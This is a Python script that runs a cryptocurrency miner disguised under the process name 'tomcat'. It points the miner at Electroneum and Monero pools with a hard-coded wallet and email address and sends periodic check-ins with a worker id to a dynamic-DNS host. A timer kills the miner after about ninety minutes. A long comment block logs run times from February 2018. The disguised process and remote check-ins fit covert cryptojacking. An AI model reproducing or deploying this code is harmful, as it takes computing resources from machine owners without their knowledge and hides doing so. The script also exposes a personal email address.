import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:01.370621
#2018-02-17 17:04:07.295144
#2018-02-17 18:52:07.018132
#2018-02-17 20:39:01.591884
#2018-02-17 22:26:03.468437
#2018-02-18 00:09:01.511754
#2018-02-18 02:01:03.945947
#2018-02-18 03:48:05.173426
#2018-02-18 05:35:05.694762
#2018-02-18 07:28:04.359579
#2018-02-18 09:16:05.250417
#2018-02-18 11:02:06.132739
#2018-02-18 12:48:06.303138
#2018-02-18 14:34:06.758465
#2018-02-18 16:25:02.856320
#2018-02-18 18:14:01.491301
#2018-02-18 20:00:08.883535
#2018-02-18 21:47:01.930683
#2018-02-18 23:35:06.094215
#2018-02-19 01:21:06.120448
#2018-02-19 03:10:01.524872
#2018-02-19 04:55:05.336875
#2018-02-19 06:41:01.279518
#2018-02-19 08:31:06.495177
#2018-02-19 10:20:06.864933
#2018-02-19 12:08:01.530948
#2018-02-19 13:55:04.116404
#2018-02-19 15:44:04.561194
#2018-02-19 17:32:07.233659
#2018-02-19 19:21:08.027673
#2018-02-19 21:08:04.810623
#2018-02-19 22:56:08.170175
#2018-02-20 00:41:01.951568
#2018-02-20 02:31:06.355262
#2018-02-20 04:20:06.858155
#2018-02-20 06:04:05.346182
#2018-02-20 07:49:01.487137
#2018-02-20 09:35:04.579227
#2018-02-20 11:19:03.877273
#2018-02-20 13:06:01.930764
#2018-02-20 14:49:02.202910
#2018-02-20 16:36:04.381288
#2018-02-20 18:22:04.775820
#2018-02-20 20:14:04.111171
#2018-02-20 22:00:09.274792
#2018-02-20 23:41:04.202269
#2018-02-21 01:27:01.284321
#2018-02-21 03:17:05.239555
#2018-02-21 05:05:01.442838
#2018-02-21 06:52:05.413170
#2018-02-21 08:38:03.791116
#2018-02-21 10:24:01.620026
#2018-02-21 12:12:05.532787
#2018-02-21 14:02:06.696926
#2018-02-21 15:48:08.436038
#2018-02-21 17:42:06.274841
#2018-02-21 19:28:06.643260
#2018-02-21 21:16:01.884865
#2018-02-21 23:02:03.639483
#2018-02-22 00:49:06.245144
#2018-02-22 02:38:02.179209
#2018-02-22 04:26:08.145602
#2018-02-22 06:11:09.111400
#2018-02-22 07:55:07.960025
#2018-02-22 09:44:04.448015
#2018-02-22 11:29:01.596484
#2018-02-22 13:16:07.444791
#2018-02-22 15:05:04.937625
#2018-02-22 16:49:09.841288
#2018-02-22 18:37:01.286335
#2018-02-22 20:29:04.388117
#2018-02-22 22:14:06.904468
#2018-02-23 00:00:05.208610
#2018-02-23 01:49:01.953844
#2018-02-23 03:39:07.018551
#2018-02-23 05:25:08.717341
#2018-02-23 07:11:06.707145
#2018-02-23 09:16:07.719348
#2018-02-23 11:22:07.836322
#2018-02-23 13:12:08.629176
#2018-02-23 14:57:04.797727
#2018-02-23 16:47:06.947539
#2018-02-23 18:32:01.773484
#2018-02-23 20:21:05.524032
#2018-02-23 22:08:02.160662
#2018-02-23 23:57:04.141734
#2018-02-24 01:48:04.787550
#2018-02-24 03:35:01.680255
#2018-02-24 05:20:08.960972
#2018-02-24 07:08:05.641975
#2018-02-24 08:55:05.699594
#2018-02-24 10:56:06.072954
#2018-02-24 12:46:01.885465
#2018-02-24 14:35:05.860736
#2018-02-24 16:21:03.502492
#2018-02-24 18:15:09.232239
#2018-02-24 20:02:04.464208
#2018-02-24 21:45:03.532783
#2018-02-25 00:48:05.741625
#2018-02-25 03:51:04.129736
#2018-02-25 07:24:07.227257